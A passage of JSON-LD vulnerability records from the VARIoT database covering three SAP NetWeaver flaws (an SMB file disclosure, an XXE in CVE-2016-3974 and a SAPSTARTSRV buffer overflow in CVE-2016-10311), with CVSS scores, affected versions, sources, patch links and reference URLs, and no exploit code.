"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "CNVD-2013-01891",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "IVD",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "62a24538-1f30-11e6-abef-000c29c66e3d",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.2,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.9 [IVD]"
}
],
"cvssV3": [],
"severity": [
{
"author": "CNVD",
"id": "CNVD-2013-01891",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "IVD",
"id": "62a24538-1f30-11e6-abef-000c29c66e3d",
"trust": 0.2,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "IVD",
"id": "62a24538-1f30-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2013-01891"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP NetWeaver is the technical foundation of SAP\u0027s integrated technology platform and all SAP applications since SAP Business Suite. When SAP NetWeaver processes SMB, there is an error in the BAPI function, which can cause any file on the SAP server file system to be leaked through the SMB relay attack. SAP NetWeaver is prone to an arbitrary file-disclosure vulnerability because it fails to properly sanitize user-supplied input before being used to read files. \nRemote attackers can exploit this issue to disclose arbitrary files in the context of the application. This may aid in further attacks. \nSAP NetWeaver 7.30 is vulnerable; other versions may also be affected",
"sources": [
{
"db": "CNVD",
"id": "CNVD-2013-01891"
},
{
"db": "BID",
"id": "58487"
},
{
"db": "IVD",
"id": "62a24538-1f30-11e6-abef-000c29c66e3d"
}
],
"trust": 0.99
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "BID",
"id": "58487",
"trust": 0.9
},
{
"db": "CNVD",
"id": "CNVD-2013-01891",
"trust": 0.8
},
{
"db": "SECUNIA",
"id": "52598",
"trust": 0.6
},
{
"db": "IVD",
"id": "62A24538-1F30-11E6-ABEF-000C29C66E3D",
"trust": 0.2
}
],
"sources": [
{
"db": "IVD",
"id": "62a24538-1f30-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2013-01891"
},
{
"db": "BID",
"id": "58487"
}
]
},
"id": "VAR-201303-0440",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "IVD",
"id": "62a24538-1f30-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2013-01891"
}
],
"trust": 1.06917922
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"ICS"
],
"sub_category": null,
"trust": 0.8
}
],
"sources": [
{
"db": "IVD",
"id": "62a24538-1f30-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2013-01891"
}
]
},
"last_update_date": "2022-05-17T01:41:29.437000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Patch for SAP NetWeaver BAPI SMB Arbitrary File Disclosure Vulnerability",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/32937"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2013-01891"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 0.6,
"url": "http://secunia.com/advisories/52598/"
},
{
"trust": 0.3,
"url": "http://erpscan.com/advisories/dsecrg-13-005-sap-netweaver-bapi-smb-relay-vulnerability/"
},
{
"trust": 0.3,
"url": "http://www.sap.com/"
},
{
"trust": 0.3,
"url": "https://websmp130.sap-ag.de/sap/support/notes/1446476"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2013-01891"
},
{
"db": "BID",
"id": "58487"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "IVD",
"id": "62a24538-1f30-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2013-01891"
},
{
"db": "BID",
"id": "58487"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2013-03-21T00:00:00",
"db": "IVD",
"id": "62a24538-1f30-11e6-abef-000c29c66e3d"
},
{
"date": "2013-03-20T00:00:00",
"db": "CNVD",
"id": "CNVD-2013-01891"
},
{
"date": "2013-02-20T00:00:00",
"db": "BID",
"id": "58487"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2013-05-27T00:00:00",
"db": "CNVD",
"id": "CNVD-2013-01891"
},
{
"date": "2013-02-20T00:00:00",
"db": "BID",
"id": "58487"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "network",
"sources": [
{
"db": "BID",
"id": "58487"
}
],
"trust": 0.3
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP NetWeaver BAPI SMB Arbitrary File Disclosure Vulnerability",
"sources": [
{
"db": "CNVD",
"id": "CNVD-2013-01891"
}
],
"trust": 0.6
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Input Validation Error",
"sources": [
{
"db": "BID",
"id": "58487"
}
],
"trust": 0.3
}
}
var-201604-0102
Vulnerability from variot
XML external entity (XXE) vulnerability in the Configuration Wizard in SAP NetWeaver Java AS 7.1 through 7.5 allows remote attackers to cause a denial of service, conduct SMB Relay attacks, or access arbitrary files via a crafted XML request to _tc~monitoring~webservice~web/ServerNodesWSService, aka SAP Security Note 2235994. Vendors have confirmed this vulnerability SAP Security Note 2235994 It is released as. Supplementary information : CWE Vulnerability type by CWE-611: Improper Restriction of XML External Entity Reference ('XXE') (XML Inappropriate restrictions on external entity references ) Has been identified. Attackers can exploit this issue to obtain potentially sensitive information or cause a denial-of-service condition. This may lead to further attacks
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201604-0102",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "netweaver application server java",
"scope": "gte",
"trust": 1.0,
"vendor": "sap",
"version": "7.10"
},
{
"model": "netweaver application server java",
"scope": "lte",
"trust": 1.0,
"vendor": "sap",
"version": "7.50"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.8,
"vendor": "sap",
"version": "7.4"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.6,
"vendor": "sap",
"version": "7.40"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2016-002001"
},
{
"db": "NVD",
"id": "CVE-2016-3974"
},
{
"db": "CNNVD",
"id": "CNNVD-201604-095"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver_application_server_java:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndIncluding": "7.50",
"versionStartIncluding": "7.10",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2016-3974"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Vahagn Vardanyan from ERPScan.",
"sources": [
{
"db": "BID",
"id": "85944"
}
],
"trust": 0.3
},
"cve": "CVE-2016-3974",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "PARTIAL",
"baseScore": 6.4,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"impactScore": 4.9,
"integrityImpact": "NONE",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:P",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "Partial",
"baseScore": 7.5,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "CVE-2016-3974",
"impactScore": null,
"integrityImpact": "Partial",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "High",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "HIGH",
"baseScore": 9.1,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 3.9,
"impactScore": 5.2,
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 9.8,
"baseSeverity": "Critical",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2016-3974",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2016-3974",
"trust": 1.8,
"value": "CRITICAL"
},
{
"author": "CNNVD",
"id": "CNNVD-201604-095",
"trust": 0.6,
"value": "CRITICAL"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2016-002001"
},
{
"db": "NVD",
"id": "CVE-2016-3974"
},
{
"db": "CNNVD",
"id": "CNNVD-201604-095"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "XML external entity (XXE) vulnerability in the Configuration Wizard in SAP NetWeaver Java AS 7.1 through 7.5 allows remote attackers to cause a denial of service, conduct SMB Relay attacks, or access arbitrary files via a crafted XML request to _tc~monitoring~webservice~web/ServerNodesWSService, aka SAP Security Note 2235994. Vendors have confirmed this vulnerability SAP Security Note 2235994 It is released as. Supplementary information : CWE Vulnerability type by CWE-611: Improper Restriction of XML External Entity Reference (\u0027XXE\u0027) (XML Inappropriate restrictions on external entity references ) Has been identified. \nAttackers can exploit this issue to obtain potentially sensitive information or cause a denial-of-service condition. This may lead to further attacks",
"sources": [
{
"db": "NVD",
"id": "CVE-2016-3974"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-002001"
},
{
"db": "BID",
"id": "85944"
}
],
"trust": 1.89
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2016-3974",
"trust": 2.7
},
{
"db": "EXPLOIT-DB",
"id": "39995",
"trust": 1.6
},
{
"db": "PACKETSTORM",
"id": "137527",
"trust": 1.6
},
{
"db": "JVNDB",
"id": "JVNDB-2016-002001",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201604-095",
"trust": 0.6
},
{
"db": "BID",
"id": "85944",
"trust": 0.3
}
],
"sources": [
{
"db": "BID",
"id": "85944"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-002001"
},
{
"db": "NVD",
"id": "CVE-2016-3974"
},
{
"db": "CNNVD",
"id": "CNNVD-201604-095"
}
]
},
"id": "VAR-201604-0102",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 0.27111164
},
"last_update_date": "2023-12-18T12:57:39.098000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "SAP Security Note 2235994",
"trust": 0.8,
"url": "http://scn.sap.com/docs/doc-55451"
},
{
"title": "SAP NetWeaver AS Java Configuration Wizard XML Fixes for external entity vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=60826"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2016-002001"
},
{
"db": "CNNVD",
"id": "CNNVD-201604-095"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-611",
"trust": 1.0
},
{
"problemtype": "CWE-Other",
"trust": 0.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2016-002001"
},
{
"db": "NVD",
"id": "CVE-2016-3974"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.6,
"url": "http://packetstormsecurity.com/files/137527/sap-netweaver-as-java-7.5-xxe-injection.html"
},
{
"trust": 1.6,
"url": "http://seclists.org/fulldisclosure/2016/jun/41"
},
{
"trust": 1.6,
"url": "https://erpscan.io/advisories/erpscan-16-013-sap-netweaver-7-4-ctcprotocol-servlet-xxe/"
},
{
"trust": 1.6,
"url": "https://erpscan.io/press-center/blog/sap-security-notes-march-2016-review/"
},
{
"trust": 1.6,
"url": "https://www.exploit-db.com/exploits/39995/"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2016-3974"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2016-3974"
},
{
"trust": 0.8,
"url": "https://erpscan.com/advisories/erpscan-16-013-sap-netweaver-7-4-ctcprotocol-servlet-xxe/"
},
{
"trust": 0.3,
"url": "http://www.sap.com"
}
],
"sources": [
{
"db": "BID",
"id": "85944"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-002001"
},
{
"db": "NVD",
"id": "CVE-2016-3974"
},
{
"db": "CNNVD",
"id": "CNNVD-201604-095"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "BID",
"id": "85944"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-002001"
},
{
"db": "NVD",
"id": "CVE-2016-3974"
},
{
"db": "CNNVD",
"id": "CNNVD-201604-095"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2016-03-08T00:00:00",
"db": "BID",
"id": "85944"
},
{
"date": "2016-04-13T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2016-002001"
},
{
"date": "2016-04-07T19:59:05.240000",
"db": "NVD",
"id": "CVE-2016-3974"
},
{
"date": "2016-04-08T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201604-095"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2016-03-08T00:00:00",
"db": "BID",
"id": "85944"
},
{
"date": "2016-04-13T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2016-002001"
},
{
"date": "2021-04-20T19:01:38.790000",
"db": "NVD",
"id": "CVE-2016-3974"
},
{
"date": "2021-04-22T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201604-095"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201604-095"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP NetWeaver Java AS of Configuration Wizard In XML External entity vulnerabilities",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2016-002001"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "code problem",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201604-095"
}
],
"trust": 0.6
}
}
var-201704-0066
Vulnerability from variot
Stack-based buffer overflow in SAP NetWeaver 7.0 through 7.5 allows remote attackers to cause a denial of service () by sending a crafted packet to the SAPSTARTSRV port, aka SAP Security Note 2295238. SAP NetWeaver Contains a stack-based buffer overflow vulnerability. SAP NetWeaver is prone to a remote buffer-overflow vulnerability because it fails to adequately bounds-check user-supplied data before copying it to an insufficiently sized memory buffer. Attackers may leverage this issue to execute arbitrary code in the context of the application. Failed exploit attempts may result in a denial-of-service condition
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201704-0066",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "netweaver",
"scope": "eq",
"trust": 1.9,
"vendor": "sap",
"version": "7.5"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 1.9,
"vendor": "sap",
"version": "7.4"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 1.9,
"vendor": "sap",
"version": "7.3"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 1.9,
"vendor": "sap",
"version": "7.0"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.8,
"vendor": "sap",
"version": "7.0 to 7.5"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "7.2"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "7.1"
}
],
"sources": [
{
"db": "BID",
"id": "91734"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-008363"
},
{
"db": "NVD",
"id": "CVE-2016-10311"
},
{
"db": "CNNVD",
"id": "CNNVD-201704-481"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:7.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:7.0:ehp1:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:7.0:ehp2:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:7.0:ehp3:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:7.3:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:7.3:ehp1:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:7.4:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:7.5:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2016-10311"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Dmitry Yudin (ERPScan)",
"sources": [
{
"db": "BID",
"id": "91734"
}
],
"trust": 0.3
},
"cve": "CVE-2016-10311",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": true,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "HIGH",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "Partial",
"baseScore": 7.5,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "CVE-2016-10311",
"impactScore": null,
"integrityImpact": "Partial",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "High",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
